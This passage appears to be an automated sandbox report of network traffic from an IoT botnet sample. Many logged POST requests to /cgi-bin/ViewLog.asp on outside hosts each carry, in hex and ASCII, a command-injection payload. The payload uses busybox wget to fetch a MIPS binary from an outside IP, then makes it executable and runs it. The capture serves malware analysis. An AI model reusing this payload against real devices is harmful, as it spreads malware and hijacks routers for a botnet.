                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.086267948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.798221111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              421192.168.2.135362494.121.123.788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:22.579154015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              422192.168.2.135351295.249.93.758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:22.773741961 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.023637056 CET90INHTTP/1.1 403 Forbidden


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              423192.168.2.134414894.120.53.838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:22.808782101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              424192.168.2.135922695.209.137.2498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:22.810565948 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              425192.168.2.134733831.136.165.888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:22.957624912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.526308060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:24.646420956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.078334093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.686331987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.646260023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.846221924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              426192.168.2.134164462.109.4.1008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.015202045 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              427192.168.2.135871894.121.122.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.024070024 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              428192.168.2.135462431.136.131.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.462363005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.054302931 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.206310034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.642278910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.246305943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.462327003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.894237995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              429192.168.2.135500895.215.20.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.476408005 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.686913967 CET475INHTTP/1.1 200 OK
                                              Content-Security-Policy: default-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; frame-ancestors 'self'
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:17:25 GMT
                                              Etag: "627e4ae0.1676"
                                              Content-Type: text/html
                                              Content-Length: 1676
                                              Connection: close
                                              Accept-Ranges: bytes


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              430192.168.2.133461085.244.46.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.480670929 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              431192.168.2.135950294.187.112.1838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.498637915 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              432192.168.2.135633094.237.102.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.654995918 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
